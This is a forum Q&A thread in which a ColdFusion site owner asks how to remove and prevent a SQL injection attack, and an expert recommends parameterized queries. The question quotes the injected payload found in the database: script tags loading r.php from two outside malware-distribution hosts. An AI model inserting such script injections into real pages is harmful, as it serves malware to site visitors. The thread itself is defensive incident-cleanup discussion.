Solved

SQL injection attack on windows 2000 server, coldfusion site

Posted on 2013-01-22
4
574 Views
Last Modified: 2013-01-22
Hello,
  We have a Coldfusion site that has been attacked. It is on a windows 2000 server running coldfusion 5 and I need to know how to find and get rid of the malicious code. I have changed the cfquery tag to include cfqueryparam but that has not helped. Currently users are periodically getting this error:

Danger: Malware Ahead!
Google Chrome has blocked access to this page on www.ourweburl.net
Content from hgbyju.com, a known malware distributor, has been inserted into this web page. Visiting this page now is very likely to infect your computer with malware.

I cannot locate any tools that will run on the server and malwarebytes did not find anything. Any assistance would be greatly appreciated.

I just found where the malicious code was placed in our table and removed it but how do I prevent it from returning?   Here is what had been entered into one of the columns on multiple records.
              </title><script src=http://hgbyju.com/r.php ></script>                 </title><script src=http://nmmkmm.com/r.php ></script>
0
Comment
Question by:jdines
  • 2
  • 2
4 Comments
 
LVL 33

Expert Comment

by:Big Monty
ID: 38807069
to prevent the code from coming back, you're going to need to alter your code to either sanitize your data inputs or use prepared sql queries:

http://stackoverflow.com/questions/60174/how-to-prevent-sql-injection-in-php

it'll take some time but will ultimately save you these types of headaches when they occur.
0
 

Author Comment

by:jdines
ID: 38807160
Hello,
  My page is actually a Coldfusion page so I searched how to prevent sql injection in coldfusion and came up with this:

http://stackoverflow.com/questions/2592700/how-do-i-prevent-sql-injection-with-coldfusion

I have actually already updated the queries so will this take care of future problems? Thanks.
0
 
LVL 33

Accepted Solution

by:
Big Monty earned 500 total points
ID: 38807197
that should take of it, unless you have other open avenues to your data
0
 

Author Closing Comment

by:jdines
ID: 38807321
Thank you very much!
0

Featured Post

Gigs: Get Your Project Delivered by an Expert

Select from freelancers specializing in everything from database administration to programming, who have proven themselves as experts in their field. Hire the best, collaborate easily, pay securely and get projects done right.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

With healthcare moving into the digital age with things like Healthcare.gov, the digitization of patient records and video conferencing with patients, data has a much greater chance of being exposed than ever before.
One of the biggest threats facing all high-value targets are APT's.  These threats include sophisticated tactics that "often starts with mapping human organization and collecting intelligence on employees, who are nowadays a weaker link than network…
This videos aims to give the viewer a basic demonstration of how a user can query current session information by using the SYS_CONTEXT function
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…

786 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question